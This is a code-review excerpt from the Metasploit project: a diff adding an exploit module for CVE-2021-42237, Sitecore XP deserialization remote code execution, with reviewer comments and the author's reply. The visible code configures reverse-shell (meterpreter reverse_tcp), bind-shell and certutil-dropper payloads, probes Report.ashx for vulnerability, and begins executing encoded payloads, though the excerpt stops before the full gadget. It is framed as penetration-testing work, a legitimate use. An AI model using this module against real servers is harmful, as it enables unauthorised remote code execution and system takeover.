modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,216 @@
+          of the "getsystem" command to use RPCSS impersonation and get SYSTEM level code execution.
+        },
+        'Author' => [
+          'AssetNote', # Discovery and exploit
+          'gwillcox-r7' # Module
+        ],
+        'References' => [
+          ['CVE', '2021-42237'],
+          ['URL', 'https://blog.assetnote.io/2021/11/02/sitecore-rce/'],
+          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776'],
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_bind_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :certutil,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'WfsDelay' => 30 # It can take a few seconds for reverse shells to trigger. Bind shells should be pretty quick.
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path of Sitecore', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sitecore', 'shell', 'ClientBin', 'Reporting', 'Report.ashx'),
+      'redirect_depth' => 0
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res.code == 200 && res.body.include?('Sitecore.Analytics.Reporting.ReportDataSerializer.DeserializeQuery')
+      return CheckCode::Safe('Target is not running Sitecore XP or has patched the vulnerability.')
+    end
+
+    return CheckCode::Appears('Response.ashx is accessible and appears to be deserializing data!')
+  end
+
+  def exploit
+    case target['Type']
+    when :win_cmd
+      print_status('Executing command payload')
+      execute_command(payload.encoded)
+      return
```

Comment:
```suggestion
```

Reply:
Woops looks like I had originally planned this to be slightly different and forgot to clean this up during editing of the code, thanks for spotting this.

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c